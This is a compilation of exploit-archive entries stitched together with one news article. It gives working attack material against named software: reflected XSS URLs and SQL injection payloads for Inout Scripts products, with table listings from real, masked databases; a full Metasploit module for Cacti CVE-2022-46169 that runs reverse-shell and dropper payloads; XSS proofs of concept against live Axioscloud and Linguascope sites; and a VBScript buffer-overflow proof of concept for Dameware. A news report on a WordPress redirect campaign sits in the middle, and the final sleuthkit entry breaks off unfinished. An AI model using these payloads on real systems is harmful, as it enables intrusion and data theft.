Inout Jobs Portal version 2.2.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout Jobs Portal 2.2.2                                                    ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpMethod: GETURL parameter 'page' is vulnerable to XSShttps://www.website.com/index.php?page=index%2findexyar11%3cimg%20src%3da%20onerror%3dalert(1)%3ex75a9[-] Done

Inout Jobs Portal 2.2.2 Cross Site Scripting

Inout Jobs Portal version 2.2.2 suffers from a remote SQL injection vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : inoutscripts.com                                                           │  
│  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        │  
│  Software : Inout Jobs Portal 2.2.2                                                    │  
│  Vuln Type: SQL Injection                                                              │  
│  Impact   : Database Access                                                            │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│ Release Notes:                                                                         │  
│ ═════════════                                                                          │  
│                                                                                        │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and     │  
│ damage to a company reputation                                                         │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php?page=jobs/searchresult

Method: POST

POST parameter 'loc_id' is vulnerable to SQLI

+-----------------------------------------------------------+

-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="search_query"

web  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="c_id"

1  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="loc_id"

1[INJECT-HERE]  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="serchtype"

simple  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="c_id"

0  
-----------------------------245625052541747605171577107419

+-----------------------------------------------------------+

[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.6  
[INFO] fetching tables for database: '*****_jobs_portal'  
Database: *****_jobs_portal  
[53 tables]  
+-----------------------------------------+  
| nesote_inoutscripts_company_ratereview  |  
| nesote_inoutscripts_homepage_banner     |  
| nesote_inoutscripts_users               |  
| nesote_jobportal_admin                  |  
| nesote_jobportal_applied_jobs           |  
| nesote_jobportal_city                   |  
| nesote_jobportal_client_logs            |  
| nesote_jobportal_company_size           |  
| nesote_jobportal_company_type           |  
| nesote_jobportal_companyblock           |  
| nesote_jobportal_contents               |  
| nesote_jobportal_country                |  
| nesote_jobportal_coverletters           |  
| nesote_jobportal_currency               |  
| nesote_jobportal_email_templates        |  
| nesote_jobportal_employer_details       |  
| nesote_jobportal_employer_feedback      |  
| nesote_jobportal_functional_role        |  
| nesote_jobportal_industry               |  
| nesote_jobportal_ip_012023              |  
| nesote_jobportal_ip_022020              |  
| nesote_jobportal_ip_032020              |  
| nesote_jobportal_ip_042020              |  
| nesote_jobportal_ip_082021              |  
| nesote_jobportal_ip_092022              |  
| nesote_jobportal_ip_102022              |  
| nesote_jobportal_ip_112022              |  
| nesote_jobportal_ip_122022              |  
| nesote_jobportal_ipn                    |  
| nesote_jobportal_job_types              |  
| nesote_jobportal_jobs                   |  
| nesote_jobportal_jobseeker_details      |  
| nesote_jobportal_languages              |  
| nesote_jobportal_locations              |  
| nesote_jobportal_messages               |  
| nesote_jobportal_months_messages        |  
| nesote_jobportal_news_and_events        |  
| nesote_jobportal_notifications          |  
| nesote_jobportal_packages               |  
| nesote_jobportal_payment_details        |  
| nesote_jobportal_previous_exp           |  
| nesote_jobportal_qualifications         |  
| nesote_jobportal_resumes                |  
| nesote_jobportal_saved_jobs             |  
| nesote_jobportal_saved_resumes          |  
| nesote_jobportal_seekers_qualifications |  
| nesote_jobportal_sent_jobalerts         |  
| nesote_jobportal_settings               |  
| nesote_jobportal_skills                 |  
| nesote_jobportal_specifications         |  
| nesote_jobportal_states                 |  
| nesote_jobportal_success_story          |  
| nesote_jobportal_themes                 |  
+-----------------------------------------+

[-] Done

Inout Jobs Portal 2.2.2 SQL Injection

Inout Music version 5.1.1 suffers from a remote SQL injection vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : inoutscripts.com                                                           │  
│  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        │  
│  Software : Inout Music 5.1.1                                                          │  
│  Vuln Type: SQL Injection                                                              │  
│  Impact   : Database Access                                                            │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│ Release Notes:                                                                         │  
│ ═════════════                                                                          │  
│                                                                                        │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and     │  
│ damage to a company reputation                                                         │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php?page=explore/search

Method: POST

POST parameter 'title' is vulnerable to SQLI

---  
Parameter: title (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: title=1' AND (SELECT 9844 FROM (SELECT(SLEEP(5)))scaa) AND 'tLOV'='tLOV  
---

POST parameter 'genre' is vulnerable to SQLI

---  
Parameter: genre (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: title=1&type=videoalbum&genre=1') AND (SELECT 3533 FROM (SELECT(SLEEP(5)))ENgP) AND ('MnKg'='MnKg&country=10  
---

POST parameter 'country' is vulnerable to SQLI

---  
Parameter: country (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: title=1&type=videoalbum&genre=1&country=10 AND (SELECT 4811 FROM (SELECT(SLEEP(5)))nDdo)  
---

+-----------------------------------------------------------+

POST /index.php?page=explore/search HTTP/2

-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="title"

love[Inject-HERE]  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="type"

audioalbum  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="genre"

1[Inject-HERE]  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="country"

3[Inject-HERE]  
-----------------------------116235583720082436942508111905--

+-----------------------------------------------------------+

[-] Done

Inout Music 5.1.1 SQL Injection

A massive campaign has infected over 4,500 WordPress websites as part of a long-running operation that's been believed to be active since at least 2017.
According to GoDaddy-owned Sucuri, the infections involve the injection of obfuscated JavaScript hosted on a malicious domain named "track[.]violetlovelines[.]com" that's designed to redirect visitors to unwanted sites.
The latest operation is

Website Security / WordPress

A massive campaign has infected over 4,500 WordPress websites as part of a long-running operation that's been believed to be active since at least 2017.

According to GoDaddy-owned Sucuri, the infections involve the injection of obfuscated JavaScript hosted on a malicious domain named "track\[.\]violetlovelines\[.\]com" that's designed to redirect visitors to unwanted sites.

The latest operation is said to have been active since December 26, 2022, according to data from urlscan.io. A prior wave seen in early December 2022 impacted more than 3,600 sites, while another set of attacks recorded in September 2022 ensnared more than 7,000 sites.

The rogue code is inserted in the WordPress index.php file, with Sucuri noting that it has removed such changes from more than 33,000 files on the compromised sites in the past 60 days.

"In recent months, this malware campaign has gradually switched from the notorious fake CAPTCHA push notification scam pages to black hat 'ad networks' that alternate between redirects to legitimate, sketchy, and purely malicious websites," Sucuri researcher Denis Sinegubko said.

Thus when unsuspecting users land on one of the hacked WordPress sites, a redirect chain is triggered by means of a traffic direction system, landing the victims on pages serving sketchy ads about products that ironically block unwanted ads.

Even more troublingly, the website for one such ad blocker named Crystal Blocker is engineered to display misleading browser update alerts to trick the users into installing its extension depending on the web browser used.

The browser extension is used by nearly 110,000 users spanning Google Chrome (60,000+), Microsoft Edge (40,000+), and Mozilla Firefox (8,635).

"And while the extensions indeed have ad blocking functionality, there is no guarantee that they are safe to use — and may contain undisclosed functions in the current version or in future updates," Sinegubko explained.

Some of the redirects also fall into the outright nefarious category, with the infected websites acting as a conduit for initiating drive-by downloads.

This also includes retrieving from Discord CDN an information-stealing malware known as Raccoon Stealer, which is capable of plundering sensitive data such as passwords, cookies, autofill data from browsers, and crypto wallets.

The findings come as threat actors are setting up lookalike websites for a variety of legitimate software to distribute stealers and trojans through malicious ads in Google search results.

Google has since stepped in to block one of the rogue domains involved in the redirect scheme, classifying it as an unsafe site that installs "unwanted or malicious software on visitors' computers."

To mitigate such threats, WordPress site owners are advised to change passwords and update installed themes and plugins as well as remove those that are unused or abandoned by their developers.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Over 4,500 WordPress Sites Hacked to Redirect Visitors to Sketchy Ad Pages

This Metasploit module exploits an unauthenticated command injection vulnerability in Cacti versions through 1.2.22 in order to achieve unauthenticated remote code execution as the www-data user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Cacti 1.2.22 unauthenticated command injection',        'Description' => %q{          This module exploits an unauthenticated command injection          vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in          order to achieve unauthenticated remote code execution as the          www-data user.          The module first attempts to obtain the Cacti version to see          if the target is affected. If LOCAL_DATA_ID and/or HOST_ID          are not set, the module will try to bruteforce the missing          value(s). If a valid combination is found, the module will          use these to attempt exploitation. If LOCAL_DATA_ID and/or          HOST_ID are both set, the module will immediately attempt          exploitation.          During exploitation, the module sends a GET request to          /remote_agent.php with the action parameter set to polldata          and the X-Forwarded-For header set to the provided value for          X_FORWARDED_FOR_IP (by default 127.0.0.1). In addition, the          poller_id parameter is set to the payload and the host_id          and local_data_id parameters are set to the bruteforced or          provided values. If X_FORWARDED_FOR_IP is set to an address          that is resolvable to a hostname in the poller table, and the          local_data_id and host_id values are vulnerable, the payload          set for poller_id will be executed by the target.          This module has been successfully tested against Cacti          version 1.2.22 running on Ubuntu 21.10 (vulhub docker image)        },        'License' => MSF_LICENSE,        'Author' => [          'Stefan Schiller', # discovery (independent of Steven Seeley)          'Steven Seeley', # (mr_me) @steventseeley - discovery (independent of Stefan Schiller)          'Owen Gong', # @phithon_xg - vulhub PoC          'Erik Wynter' # @wyntererik - Metasploit        ],        'References' => [          ['CVE', '2022-46169'],          ['URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf'], # disclosure and technical details          ['URL', 'https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169'], # vulhub vulnerable docker image and PoC          ['URL', 'https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution'] # analysis by Stefan Schiller        ],        'DefaultOptions' => {          'RPORT' => 8080        },        'Platform' => %w[unix linux],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Automatic (Unix In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },              'Type' => :unix_memory            }          ],          [            'Automatic (Linux Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'CmdStagerFlavor' => ['echo', 'printf', 'wget', 'curl'],              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },              'Type' => :linux_dropper            }          ]        ],        'Privileged' => false,        'DisclosureDate' => '2022-12-05',        'DefaultTarget' => 1,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The base path to Cacti', '/']),      OptString.new('X_FORWARDED_FOR_IP', [true, 'The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.', '127.0.0.1']),      OptInt.new('HOST_ID', [false, 'The host_id value to use. By default, the module will try to bruteforce this.']),      OptInt.new('LOCAL_DATA_ID', [false, 'The local_data_id value to use. By default, the module will try to bruteforce this.'])    ])    register_advanced_options([      OptInt.new('MIN_HOST_ID', [true, 'Lower value for the range of possible host_id values to check for', 1]),      OptInt.new('MAX_HOST_ID', [true, 'Upper value for the range of possible host_id values to check for', 5]),      OptInt.new('MIN_LOCAL_DATA_ID', [true, 'Lower value for the range of possible local_data_id values to check for', 1]),      OptInt.new('MAX_LOCAL_DATA_ID', [true, 'Upper value for the range of possible local_data_id values to check for', 100])    ])  end  def check    # sanity check to see if the target is likely Cacti    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    })    unless res      return CheckCode::Unknown('Connection failed.')    end    unless res.code == 200 && res.body.include?('<title>Login to Cacti')      return CheckCode::Safe('Target is not a Cacti application.')    end    # get the version    version = res.body.scan(/Version (.*?) \| $c$/)&.flatten&.first    if version.blank?      return CheckCode::Detected('Could not determine the Cacti version: the HTTP response body did not match the expected format.')    end    begin      if Rex::Version.new(version) <= Rex::Version.new('1.2.22')        return CheckCode::Appears("The target is Cacti version #{version}")      else        return CheckCode::Safe("The target is Cacti version #{version}")      end    rescue StandardError => e      return CheckCode::Unknown("Failed to obtain a valid Cacti version: #{e}")    end  end  def exploitable_rrd_names    [      'apache_total_kbytes',      'apache_total_hits',      'apache_total_hits',      'apache_total_kbytes',      'apache_cpuload',      'boost_avg_size',      'boost_peak_memory',      'boost_records',      'boost_table',      'ExportDuration',      'ExportGraphs',      'syslogRuntime',      'tholdRuntime',      'polling_time',      'uptime',    ]  end  def brute_force_ids    # perform a sanity check first    if @host_id      host_ids = [@host_id]    else      if datastore['MAX_HOST_ID'] < datastore['MIN_HOST_ID']        fail_with(Failure::BadConfig, 'The value for MAX_HOST_ID is lower than MIN_HOST_ID. This is impossible')      end      host_ids = (datastore['MIN_HOST_ID']..datastore['MAX_HOST_ID']).to_a    end    if @local_data_id      local_data_ids = [@local_data_ids]    else      if datastore['MAX_LOCAL_DATA_ID'] < datastore['MIN_LOCAL_DATA_ID']        fail_with(Failure::BadConfig, 'The value for MAX_LOCAL_DATA_ID is lower than MIN_LOCAL_DATA_ID. This is impossible')      end      local_data_ids = (datastore['MIN_LOCAL_DATA_ID']..datastore['MAX_LOCAL_DATA_ID']).to_a    end    # lets make sure the module never performs more than 1,000 possible requests to try and bruteforce host_id and local_data_id    max_attempts = host_ids.length * local_data_ids.length    if max_attempts > 1000      fail_with(Failure::BadConfig, 'The number of possible HOST_ID and LOCAL_DATA_ID combinations exceeds 1000. Please limit this number by adjusting the MIN and MAX options for both parameters.')    end    potential_targets = []    request_ct = 0    print_status("Trying to bruteforce an exploitable host_id and local_data_id by trying up to #{max_attempts} combinations")    host_ids.each do |h_id|      print_status("Enumerating local_data_id values for host_id #{h_id}")      local_data_ids.each do |ld_id|        request_ct += 1        print_status("Performing request #{request_ct}...") if request_ct % 25 == 0        res = send_request_cgi(remote_agent_request(ld_id, h_id, rand(1..1000)))        unless res          print_error('No response received. Aborting bruteforce')          return nil        end        unless res.code == 200          print_error("Received unexpected response code #{res.code}. This shouldn't happen. Aborting bruteforce")          return nil        end        begin          parsed_response = JSON.parse(res.body)        rescue JSON::ParserError          print_error("The response body is not in valid JSON format. This shouldn't happen. Aborting bruteforce")          return nil        end        unless parsed_response.is_a?(Array)          print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")          return nil        end        # the array can be empty, which is not an error but just means the local_data_id is not exploitable        next if parsed_response.empty?        first_item = parsed_response.first        unless first_item.is_a?(Hash) && ['value', 'rrd_name', 'local_data_id'].all? { |key| first_item.keys.include?(key) }          print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")          return nil        end        # some data source types that can be exploited have a valid rrd_name. these are included in the exploitable_rrd_names array        # if we encounter one of these, we should assume the local_data_id is exploitable and try to exploit it        # in addition, some data source types have an empty rrd_name but are still exploitable        # however, if the rrd_name is blank, the only way to verify if a local_data_id value corresponds to an exploitable data source, is to actually try and exploit it        # instead of trying to exploit all potential targets of the latter category, let's just save these and print them at the end        # then the user can try to exploit them manually by setting the HOST_ID and LOCAL_DATA_ID options        rrd_name = first_item['rrd_name']        if rrd_name.empty?          potential_targets << [h_id, ld_id]        elsif exploitable_rrd_names.include?(rrd_name)          print_good("Found exploitable local_data_id #{ld_id} for host_id #{h_id}")          return [h_id, ld_id]        else          next # if we have a valid rrd_name but it's not in the exploitable_rrd_names array, we should move on        end      end    end    return nil if potential_targets.empty?    # inform the user about potential targets    print_warning("Identified #{potential_targets.length} host_id - local_data_id combination(s) that may be exploitable, but could not be positively identified as such:")    potential_targets.each do |h_id, ld_id|      print_line("\thost_id: #{h_id} - local_data_id: #{ld_id}")    end    print_status('You can try to exploit these by manually configuring the HOST_ID and LOCAL_DATA_ID options')    nil  end  def execute_command(cmd, _opts = {})    # use base64 encoding to get around special char limitations    cmd = "`echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/bash`"    send_request_cgi(remote_agent_request(@local_data_id, @host_id, cmd), 0)  end  def exploit    @host_id = datastore['HOST_ID'] if datastore['HOST_ID'].present?    @local_data_id = datastore['LOCAL_DATA_ID'] if datastore['LOCAL_DATA_ID'].present?    unless @host_id && @local_data_id      brute_force_result = brute_force_ids      unless brute_force_result        fail_with(Failure::NoTarget, 'Failed to identify an exploitable host_id - local_data_id combination.')      end      @host_id, @local_data_id = brute_force_result    end    if target.arch.first == ARCH_CMD      print_status('Executing the payload. This may take a few seconds...')      execute_command(payload.encoded)    else      execute_cmdstager(background: true)    end  end  def remote_agent_request(ld_id, h_id, poller_id)    {      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'remote_agent.php'),      'headers' => {        'X-Forwarded-For' => datastore['X_FORWARDED_FOR_IP']      },      'vars_get' => {        'action' => 'polldata',        'local_data_ids[0]' => ld_id,        'host_id' => h_id,        'poller_id' => poller_id # when bruteforcing, this is a random number, but during exploitation this is the payload      }    }  endend

Cacti 1.2.22 Command Injection

Inout Search Engine version 10.1.3 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout Search Engine 10.1.3                                                 ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpMethod: GETURL parameter 'page' is vulnerable to XSShttps://www.example.com/index.php?page=footer%2femailafriendlaten%3cimg%20src%3da%20onerror%3dalert(1)%3ef96cd[-] Done

Inout Search Engine 10.1.3 Cross Site Scripting

Inout Homestay version 2.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout Homestay 2.2                                                         ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php?page=search/searchdetailedbroom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=IndianapolisPOST parameter 'broom' is vulnerable to SQLIPOST parameter 'bathr' is vulnerable to SQLIPOST parameter 'beds' is vulnerable to SQLIPOST parameter 'numguest' is vulnerable to SQLIPath: /index.php?page=search/rentalslocation=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=IndianaPOST parameter 'guests' is vulnerable to SQLI---Parameter: broom (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split    Type: UNION query    Title: Generic UNION query (NULL) - 27 columns    Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split---[INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.12[INFO] fetching tables for database: '*****_homestay'Database: *****_homestay[52 tables]+----------------------------------+| admin_account                    || admin_payment_details            || category_property                || chat_details                     || chat_messages                    || checkout_ipn                     || countries                        || coupon_detail                    || cron_details                     || custom_field                     || demo_message                     || email_details                    || email_templates                  || forgetpassword                   || host_rejected                    || inout_ipns                       || languages                        || list_date_request                || list_images                      || listing_date                     || listing_detail                   || listing_main                     || message_notify_app               || messages                         || msg_req_temp                     || ppc_currency                     || public_side_media_detail         || public_slide_images              || refund_creditupdate              || request_coupon_detail            || settings                         || superhost_detail                 || traveller_bank_deposit_history   || traveller_cancellation_modes     || traveller_cancelled              || user_account_detail              || user_address_verify_request      || user_details                     || user_email_verification          || user_listing_request             || user_refunddetails               || user_registration                || user_reviews                     || user_search_details              || user_settings                    || user_wishlist_mapping            || user_withdrawal_details          || userabusereport                  || userbank_pending_listing_request || usercancellationsaction          || wish_list                        || withdrawal_request               |+----------------------------------+[-] Done

Inout Homestay 2.2 SQL Injection

OS Command injection vulnerability in sleuthkit fls tool 4.11.1 allows attackers to execute arbitrary commands via a crafted value to the m parameter.

**Axioscloud Sissiweb Registro Elettronico - 'Error\_desc' Reflective Cross Site Script**

\# Date: 2018-10-11  
\# Vendor Homepage: http://axiositalia.it/  
\# Software Link: http://axiositalia.it/?page\_id=1907  
\# Version: 1.7.0/7.0.0  
\# Category: Webapps  
\# Platform: ASPX  
\# CVE-2018-18437  
\# POC:  
\# https://family.axioscloud.it/secret/relogoff.aspx?Error\_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error\_Parameters=

**Linguascope Language Learning Platform - 'Activity' Reflective Cross Site Script**

\# Date: 2018-11-24  
\# Vendor Homepage: https://www.linguascope.com  
\# Category: Webapps  
\# Platform: PHP  
\# POC:  
\# https://www.linguascope.com/secure/students/elementary/html5/bin/main.php?language=english&activity=%22/%3E%3Cscript%3Ealert(%27Hacked%27)%3C/script%3E%3C%22

**Dameware Mini Remote Control 10.0 - Buffer Overflow / Denial of Service CVE-2019-9017**

\# Date: 2019-02-22  
\# Vendor: Solarwinds  
\# Tested on: Windows 7 SP1 x64  
\# CVE ID: CVE-2019-9017  
\# POC in VB Script  
option explicit  
dim fold,exe,buf,i,wsh,fso,result  
exe = "DWRCC.exe"  
fold = "C:\\program files\\SolarWinds\\DameWare Mini Remote Control 10.0 x64 #1\\"  
for i = 0 to 300  
buf = buf & "A"  
next  
set wsh = createobject("wscript.shell")  
set fso = createobject("scripting.filesystemobject")  
if fso.folderexists(fold) then  
fold = fold & exe  
fold = chr(34) & fold & chr(34)  
result = wsh.run(fold & " -c: -h: -m:" & buf,0,true)  
end if

**OS Command injection vulnerability in sleuthkit fls tool CVE-2022-45639**

\# Date: 2023-01-20  
\# CVE-2022-45639  
\# Vendor Homepage: https://github.com/sleuthkit  
\# Vulnerability Type: Command injection  
\# Attack Type: Local  
\# Version: 4.11.1  
\# POC:

